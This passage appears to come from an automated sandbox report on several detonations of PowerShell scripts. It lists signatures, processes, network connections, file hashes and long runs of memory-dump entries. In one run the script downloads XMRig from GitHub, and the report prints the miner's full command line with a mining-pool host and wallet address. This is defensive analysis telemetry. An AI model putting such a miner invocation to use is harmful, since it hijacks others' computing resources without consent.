memory/1820-57-0x0000028736630000-0x0000028736650000-memory.dmp
memory/1820-56-0x0000028736610000-0x0000028736630000-memory.dmp
memory/1820-58-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-59-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-60-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-61-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-62-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-63-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-64-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-65-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-66-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-67-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-68-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-69-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-70-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-71-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-72-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-73-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-74-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-75-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-76-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-77-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-78-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-79-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-80-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-81-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-82-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-83-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-84-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-85-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-86-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-87-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-88-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-89-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-90-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-91-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-92-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-93-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-94-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-95-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-96-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-97-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-98-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-99-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-100-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-101-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-102-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-103-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-104-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-105-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-106-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-107-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-108-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-109-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-110-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-111-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-112-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-113-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-114-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-115-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-116-0x00007FF732B10000-0x00007FF733743000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:44
Platform
win11-20240508-en
Max time kernel
1651s
Max time network
1660s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/2492-0-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp
memory/2492-9-0x000001B1AA220000-0x000001B1AA242000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsgnixku.waa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2492-10-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/2492-11-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/2492-12-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/2492-13-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp
memory/2492-14-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:49
Platform
win10v2004-20240226-en
Max time kernel
1794s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3588 wrote to memory of 4468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3588 wrote to memory of 4468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4164 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | 29.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
Files
memory/3588-0-0x00007FF984463000-0x00007FF984465000-memory.dmp
memory/3588-1-0x00000172E7E90000-0x00000172E7EB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pko3hmyb.2v0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3588-11-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/3588-12-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/3588-13-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/3588-15-0x00000172E8240000-0x00000172E8252000-memory.dmp
memory/3588-16-0x00000172E8220000-0x00000172E822A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4468-47-0x000001E9C6880000-0x000001E9C68A0000-memory.dmp
memory/3588-48-0x00007FF984463000-0x00007FF984465000-memory.dmp
memory/3588-49-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/4468-50-0x000001E9C68D0000-0x000001E9C68F0000-memory.dmp
memory/3588-51-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/4468-52-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-53-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-54-0x000001E9C6910000-0x000001E9C6930000-memory.dmp
memory/4468-55-0x000001E9C6930000-0x000001E9C6950000-memory.dmp
memory/4468-56-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-57-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-58-0x000001E9C6910000-0x000001E9C6930000-memory.dmp
memory/4468-59-0x000001E9C6930000-0x000001E9C6950000-memory.dmp
memory/4468-60-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-61-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-62-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-63-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-64-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-65-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-66-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-67-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-68-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-69-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-70-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-71-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-72-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-73-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-74-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-75-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-76-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-77-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-78-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-79-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-80-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-81-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-82-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-83-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-84-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-85-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-86-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-87-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-88-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-89-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-90-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-91-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-92-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-93-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-94-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-95-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-96-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-97-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-98-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-99-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-100-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-101-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-102-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-103-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-104-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-105-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-106-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-107-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-108-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-109-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-110-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-111-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-112-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-113-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-114-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-115-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-116-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-117-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-118-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:48
Platform
win11-20240508-en
Max time kernel
1651s
Max time network
1661s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/3876-0-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pgpwoh3e.tsx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3876-9-0x0000018DB7680000-0x0000018DB76A2000-memory.dmp
memory/3876-10-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/3876-11-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/3876-12-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/3876-13-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp
memory/3876-14-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp